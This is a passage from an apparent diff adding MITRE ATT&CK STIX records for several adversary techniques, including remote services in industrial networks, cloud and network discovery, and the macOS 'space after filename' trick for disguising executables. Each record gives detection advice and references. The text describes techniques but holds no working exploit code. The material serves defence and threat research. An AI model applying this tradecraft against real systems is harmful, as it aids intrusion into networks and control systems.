"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1584/004", + "external_id": "T1584.004" + }, + { + "source_name": "TrendMicro EarthLusca 2022", + "description": "Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.", + "url": "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf" + }, + { + "source_name": "Koczwara Beacon Hunting Sep 2021", + "description": "Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with Shodan. Retrieved October 12, 2021.", + "url": "https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2" + }, + { + "source_name": "Mandiant SCANdalous Jul 2020", + "description": "Stephens, A. (2020, July 13). SCANdalous! (External Detection Using Network Scan Data and Automation). Retrieved October 12, 2021.", + "url": "https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation" + }, + { + "source_name": "ThreatConnect Infrastructure Dec 2020", + "description": "ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.", + "url": "https://threatconnect.com/blog/infrastructure-research-hunting/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-13T17:57:12.125Z", + "name": "Remote Services", + "description": "Adversaries may leverage remote services to move between assets and network segments. These services are often used to allow operators to interact with systems remotely within the network, some examples are RDP, SMB, SSH, and other similar mechanisms. (Citation: Blake Johnson, Dan Caban, Marina Krotofil, Dan Scali, Nathan Brubaker, Christopher Glyer December 2017) (Citation: Dragos December 2017) (Citation: Joe Slowik April 2019) \n\nRemote services could be used to support remote access, data transmission, authentication, name resolution, and other remote functions. Further, remote services may be necessary to allow operators and administrators to configure systems within the network from their engineering or management workstations. An adversary may use this technique to access devices which may be dual-homed (Citation: Blake Johnson, Dan Caban, Marina Krotofil, Dan Scali, Nathan Brubaker, Christopher Glyer December 2017) to multiple network segments, and can be used for [Program Download](https://attack.mitre.org/techniques/T0843) or to execute attacks on control devices directly through [Valid Accounts](https://attack.mitre.org/techniques/T0859).\n\nSpecific remote services (RDP & VNC) may be a precursor to enable [Graphical User Interface](https://attack.mitre.org/techniques/T0823) execution on devices such as HMIs or engineering workstation software.\n\nBased on incident data, CISA and FBI assessed that Chinese state-sponsored actors also compromised various authorized remote access channels, including systems designed to transfer data and/or allow access between corporate and ICS networks. (Citation: CISA AA21-201A Pipeline Intrusion July 2021)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "initial-access" + }, + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "lateral-movement" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Daisuke Suzuki" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Flow", + "Module: Module Load", + "Logon Session: Logon Session Creation", + "Process: Process Creation", + "Command: Command Execution", + "Network Traffic: Network Connection Creation", + "Network Share: Network Share Access" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--e1f9cdd2-9511-4fca-90d7-f3e92cfdd0bf", + "created": "2021-04-12T19:26:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0886", + "external_id": "T0886" + }, + { + "source_name": "Blake Johnson, Dan Caban, Marina Krotofil, Dan Scali, Nathan Brubaker, Christopher Glyer December 2017", + "description": "Blake Johnson, Dan Caban, Marina Krotofil, Dan Scali, Nathan Brubaker, Christopher Glyer 2017, December 14 Attackers Deploy New ICS Attack Framework TRITON and Cause Operational Disruption to Critical Infrastructure Retrieved. 2018/01/12 ", + "url": "https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html" + }, + { + "source_name": "CISA AA21-201A Pipeline Intrusion July 2021", + "description": "Department of Justice (DOJ), DHS Cybersecurity & Infrastructure Security Agency (CISA) 2021, July 20 Chinese Gas Pipeline Intrusion Campaign, 2011 to 2013 Retrieved. 2021/10/08 ", + "url": "https://us-cert.cisa.gov/sites/default/files/publications/AA21-201A_Chinese_Gas_Pipeline_Intrusion_Campaign_2011_to_2013%20(1).pdf" + }, + { + "source_name": "Dragos December 2017", + "description": "Dragos 2017, December 13 TRISIS Malware Analysis of Safety System Targeted Malware Retrieved. 2018/01/12 ", + "url": "https://dragos.com/blog/trisis/TRISIS-01.pdf" + }, + { + "source_name": "Joe Slowik April 2019", + "description": "Joe Slowik 2019, April 10 Implications of IT Ransomware for ICS Environments Retrieved. 2019/10/27 ", + "url": "https://dragos.com/blog/industry-news/implications-of-it-ransomware-for-ics-environments/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-31T14:00:00.188Z", + "name": "Cloud Service Discovery", + "description": "An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Azure AD, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.\n\nAdversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Azure AD Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)\n\nFor example, Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.(Citation: Azure - Stormspotter)(Citation: GitHub Pacu)\n\nAdversaries may use the information gained to shape follow-on behaviors, such as targeting data or credentials from enumerated services or evading identified defenses through [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001) or [Disable or Modify Cloud Logs](https://attack.mitre.org/techniques/T1562/008).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Suzy Schapperle - Microsoft Azure Red Team", + "Praetorian", + "Thanabodi Phrakhun, I-SECURE" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Cloud service discovery techniques will likely occur throughout an operation where an adversary is targeting cloud-based systems and services. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.\n\nNormal, benign system and network events that look like cloud service discovery may be uncommon, depending on the environment and how they are used. Monitor cloud service usage for anomalous behavior that may indicate adversarial presence within the environment.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Azure AD", + "Office 365", + "SaaS", + "IaaS", + "Google Workspace" + ], + "x_mitre_version": "1.3", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--e24fcba8-2557-4442-a139-1ee2f2e784db", + "created": "2019-08-30T13:01:10.120Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1526", + "external_id": "T1526" + }, + { + "source_name": "Azure AD Graph API", + "description": "Microsoft. (2016, March 26). Operations overview | Graph API concepts. Retrieved June 18, 2020.", + "url": "https://docs.microsoft.com/en-us/previous-versions/azure/ad/graph/howto/azure-ad-graph-api-operations-overview" + }, + { + "source_name": "Azure - Resource Manager API", + "description": "Microsoft. (2019, May 20). Azure Resource Manager. Retrieved June 17, 2020.", + "url": "https://docs.microsoft.com/en-us/rest/api/resources/" + }, + { + "source_name": "Azure - Stormspotter", + "description": "Microsoft. (2020). Azure Stormspotter GitHub. Retrieved June 17, 2020.", + "url": "https://github.com/Azure/Stormspotter" + }, + { + "source_name": "GitHub Pacu", + "description": "Rhino Security Labs. (2019, August 22). Pacu. Retrieved October 17, 2019.", + "url": "https://github.com/RhinoSecurityLabs/pacu" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Space after Filename", + "description": "Adversaries can hide a program's true filetype by changing the extension of a file. With certain file types (specifically this does not work with .app extensions), appending a space to the end of a filename will change how the file is processed by the operating system. For example, if there is a Mach-O executable file called evil.bin, when it is double clicked by a user, it will launch Terminal.app and execute. If this file is renamed to evil.txt, then when double clicked by a user, it will launch with the default text editing application (not executing the binary). However, if the file is renamed to \"evil.txt \" (note the space at the end), then when double clicked by a user, the true file type is determined by the OS and handled appropriately and the binary will be executed (Citation: Mac Backdoors are back). \n\nAdversaries can use this feature to trick users into double clicking benign-looking files of any format and ultimately executing something malicious.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Erye Hernandez, Palo Alto Networks" + ], + "x_mitre_detection": "It's not common for spaces to be at the end of filenames, so this is something that can easily be checked with file monitoring. From the user's perspective though, this is very hard to notice from within the Finder.app or on the command-line in Terminal.app. Processes executed from binaries containing non-standard extensions in the filename are suspicious.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--e2907cea-4b43-4ed7-a570-0fdf0fbeea00", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1151", + "external_id": "T1151" + }, + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/649.html", + "external_id": "CAPEC-649" + }, + { + "source_name": "Mac Backdoors are back", + "description": "Dan Goodin. (2016, July 6). After hiatus, in-the-wild Mac backdoors are suddenly back. Retrieved July 8, 2017.", + "url": "https://arstechnica.com/security/2016/07/after-hiatus-in-the-wild-mac-backdoors-are-suddenly-back/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-08T20:13:24.241Z", + "name": "I/O Module Discovery", + "description": "Adversaries may use input/output (I/O) module discovery to gather key information about a control system device. An I/O module is a device that allows the control system device to either receive or send signals to other devices. These signals can be analog or digital, and may support a number of different protocols. Devices are often able to use attachable I/O modules to increase the number of inputs and outputs that it can utilize. An adversary with access to a device can use native device functions to enumerate I/O modules that are connected to the device. Information regarding the I/O modules can aid the adversary in understanding related control processes.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": true, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--e2994b6a-122b-4043-b654-7411c5198ec0", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-ics-attack", + "url": "https://attack.mitre.org/techniques/T0824", + "external_id": "T0824" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-13T17:57:12.329Z", + "name": "Denial of Control", + "description": "Adversaries may cause a denial of control to temporarily prevent operators and engineers from interacting with process controls. An adversary may attempt to deny process control access to cause a temporary loss of communication with the control device or to prevent operator adjustment of process controls. An affected process may still be operating during the period of control loss, but not necessarily in a desired state. (Citation: Corero) (Citation: Michael J. Assante and Robert M. Lee) (Citation: Tyson Macaulay)\n\nIn the 2017 Dallas Siren incident operators were unable to disable the false alarms from the Office of Emergency Management headquarters. (Citation: Mark Loveless April 2017)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.1", + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--e33c7ecc-5a38-497f-beb2-a9a2049a4c20", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0813", + "external_id": "T0813" + }, + { + "source_name": "Corero", + "description": "Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 ", + "url": "https://www.corero.com/resources/files/whitepapers/cns_whitepaper_ics.pdf" + }, + { + "source_name": "Mark Loveless April 2017", + "description": "Mark Loveless 2017, April 11 THE DALLAS COUNTY SIREN HACK Retrieved. 2020/11/06 ", + "url": "https://duo.com/decipher/the-dallas-county-siren-hack" + }, + { + "source_name": "Michael J. Assante and Robert M. Lee", + "description": "Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 ", + "url": "https://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297" + }, + { + "source_name": "Tyson Macaulay", + "description": "Tyson Macaulay Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 RIoT Control: Understanding and Managing Risks and the Internet of Things Retrieved. 2019/11/04 ", + "url": "https://books.google.com/books?id=oXIYBAAAQBAJ&pg=PA249&lpg=PA249&dq=loss+denial+manipulation+of+view&source=bl&ots=dV1uQ8IUff&sig=ACfU3U2NIwGjhg051D_Ytw6npyEk9xcf4w&hl=en&sa=X&ved=2ahUKEwj2wJ7y4tDlAhVmplkKHSTaDnQQ6AEwAHoECAgQAQ#v=onepage&q=loss%20denial%20manipulation%20of%20view&f=false" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-08-14T19:08:59.741Z", + "name": "Remote System Discovery", + "description": "Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as [Ping](https://attack.mitre.org/software/S0097) or net view using [Net](https://attack.mitre.org/software/S0039).\n\nAdversaries may also analyze data from local host files (ex: C:\\Windows\\System32\\Drivers\\etc\\hosts or /etc/hosts) or other passive means (such as local [Arp](https://attack.mitre.org/software/S0099) cache entries) in order to discover the presence of remote systems in an environment.\n\nAdversaries may also target discovery of network infrastructure as well as leverage [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands on network devices to gather detailed information about systems within a network (e.g. show cdp neighbors, show arp).(Citation: US-CERT-TA18-106A)(Citation: CISA AR21-126A FIVEHANDS May 2021) \n", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Daniel Stepanic, Elastic", + "RedHuntLabs, @redhuntlabs", + "Austin Clark, @c2defense" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nNormal, benign system and network events related to legitimate remote system discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nMonitor for processes that can be used to discover remote systems, such as ping.exe and tracert.exe, especially when executed in quick succession.(Citation: Elastic - Koadiac Detection with EQL)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "Network" + ], + "x_mitre_version": "3.5", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--e358d692-23c0-4a31-9eb6-ecc13a8d7735", + "created": "2017-05-31T21:30:28.187Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1018", + "external_id": "T1018" + }, + { + "source_name": "CISA AR21-126A FIVEHANDS May 2021", + "description": "CISA. (2021, May 6). Analysis Report (AR21-126A) FiveHands Ransomware. Retrieved June 7, 2021.", + "url": "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a" + }, + { + "source_name": "Elastic - Koadiac Detection with EQL", + "description": "Stepanic, D.. (2020, January 13). Embracing offensive tooling: Building detections against Koadic using EQL. Retrieved November 30, 2020.", + "url": "https://www.elastic.co/blog/embracing-offensive-tooling-building-detections-against-koadic-using-eql" + }, + { + "source_name": "US-CERT-TA18-106A", + "description": "US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.", + "url": "https://www.us-cert.gov/ncas/alerts/TA18-106A" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-08-11T21:10:09.547Z", + "name": "Network Service Discovery", + "description": "Adversaries may attempt to get a listing of services running on remote hosts and local network infrastructure devices, including those that may be vulnerable to remote software exploitation. Common methods to acquire this information include port and/or vulnerability scans using tools that are brought onto a system.(Citation: CISA AR21-126A FIVEHANDS May 2021) \n\nWithin cloud environments, adversaries may attempt to discover services running on other cloud hosts. Additionally, if the cloud environment is connected to a on-premises environment, adversaries may be able to identify services running on non-cloud systems as well.\n\nWithin macOS environments, adversaries may use the native Bonjour application to discover services running on other macOS hosts within a network. The Bonjour mDNSResponder daemon automatically registers and advertises a host’s registered services on the network. For example, adversaries can use a mDNS query (such as dns-sd -B _ssh._tcp .) to find other systems broadcasting the ssh service.(Citation: apple doco bonjour description)(Citation: macOS APT Activity Bradley)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Praetorian" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nNormal, benign system and network events from legitimate remote service scanning may be uncommon, depending on the environment and how they are used. Legitimate open port and vulnerability scanning may be conducted within the environment and will need to be deconflicted with any detection capabilities developed. Network intrusion detection systems can also be used to identify scanning activity. Monitor for process use of the networks and inspect intra-network flows to detect port scans.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "IaaS", + "Linux", + "macOS", + "Containers", + "Network" + ], + "x_mitre_version": "3.1", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--e3a12395-188d-4051-9a16-ea8e14d07b88", + "created": "2017-05-31T21:30:43.915Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1046", + "external_id": "T1046" + }, + { + "source_name": "apple doco bonjour description", + "description": "Apple Inc. (2013, April 23). Bonjour Overview. Retrieved October 11, 2021.", + "url": "https://developer.apple.com/library/archive/documentation/Cocoa/Conceptual/NetServices/Introduction.html" + }, + { + "source_name": "CISA AR21-126A FIVEHANDS May 2021", + "description": "CISA. (2021, May 6). Analysis Report (AR21-126A) FiveHands Ransomware. Retrieved June 7, 2021.", + "url": "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a" + }, + { + "source_name": "macOS APT Activity Bradley", + "description": "Jaron Bradley. (2021, November 14). What does APT Activity Look Like on macOS?. Retrieved January 19, 2022.", + "url": "https://themittenmac.com/what-does-apt-activity-look-like-on-macos/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-10-21T14:32:05.257Z", + "name": "Domain Properties", + "description": "Adversaries may gather information about the victim's network domain(s) that can be used during targeting. Information about domains and their properties may include a variety of details, including what domain(s) the victim owns as well as administrative data (ex: name, registrar, etc.) and more directly actionable information such as contacts (email addresses and phone numbers), business addresses, and name servers.\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about victim domains and their properties may also be exposed to adversaries via online or other accessible data sets (ex: [WHOIS](https://attack.mitre.org/techniques/T1596/002)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Where third-party cloud providers are in use, this information may also be exposed through publicly available API endpoints, such as GetUserRealm and autodiscover in Office 365 environments.(Citation: Azure Active Directory Reconnaisance)(Citation: Office 265 Azure Domain Availability) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Jannie Li, Microsoft Threat Intelligence Center (MSTIC)" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--e3b168bd-fcd7-439e-9382-2e6c2f63514d", + "created": "2020-10-02T15:46:24.670Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1590/001", + "external_id": "T1590.001" + }, + { + "source_name": "Circl Passive DNS", + "description": "CIRCL Computer Incident Response Center. (n.d.). Passive DNS. Retrieved October 20, 2020.", + "url": "https://www.circl.lu/services/passive-dns/" + }, + { + "source_name": "Azure Active Directory Reconnaisance", + "description": "Dr. Nestori Syynimaa. (2020, June 13). Just looking: Azure Active Directory reconnaissance as an outsider. Retrieved May 27, 2022.", + "url": "https://o365blog.com/post/just-looking/" + }, + { + "source_name": "DNS Dumpster", + "description": "Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.", + "url": "https://dnsdumpster.com/" + }, + { + "source_name": "Office 265 Azure Domain Availability", + "description": "Microsoft. (2017, January 23). (Cloud) Tip of the Day: Advanced way to check domain availability for Office 365 and Azure. Retrieved May 27, 2022.", + "url": "https://docs.microsoft.com/en-us/archive/blogs/tip_of_the_day/cloud-tip-of-the-day-advanced-way-to-check-domain-availability-for-office-365-and-azure" + }, + { + "source_name": "WHOIS", + "description": "NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020.", + "url": "https://www.whois.net/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-16T00:16:06.689Z", + "name": "Software Discovery", + "description": "Adversaries may attempt to get a listing of software and software versions that are installed on a system or in a cloud environment. Adversaries may use the information from [Software Discovery](https://attack.mitre.org/techniques/T1518) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nSuch software may be deployed widely across the environment for configuration management or security reasons, such as [Software Deployment Tools](https://attack.mitre.org/techniques/T1072), and may allow adversaries broad access to infect devices or move laterally.\n\nAdversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable to [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "IaaS", + "Linux", + "macOS" + ], + "x_mitre_version": "1.4", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--e3b6daca-e963-4a69-aee6-ed4fd653ad58", + "created": "2019-09-16T17:52:44.147Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1518", + "external_id": "T1518" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-19T04:25:33.300Z", + "name": "Cloud Service Dashboard", + "description": "An adversary may use a cloud service dashboard GUI with stolen credentials to gain useful information from an operational cloud environment, such as specific services, resources, and features. For example, the GCP Command Center can be used to view all assets, findings of potential security risks, and to run additional queries, such as finding public IP addresses and open ports.(Citation: Google Command Center Dashboard)\n\nDepending on the configuration of the environment, an adversary may be able to enumerate more information via the graphical dashboard than an API. This allows the adversary to gain information without making any API requests.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Praetorian", + "Obsidian Security" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor account activity logs to see actions performed and activity associated with the cloud service management console. Some cloud providers, such as AWS, provide distinct log events for login attempts to the management console.(Citation: AWS Console Sign-in Events)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Azure AD", + "Office 365", + "IaaS", + "Google Workspace", + "SaaS" + ], + "x_mitre_version": "1.3", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--e49920b0-6c54-40c1-9571-73723653205f", + "created": "2019-08-30T18:11:24.582Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": 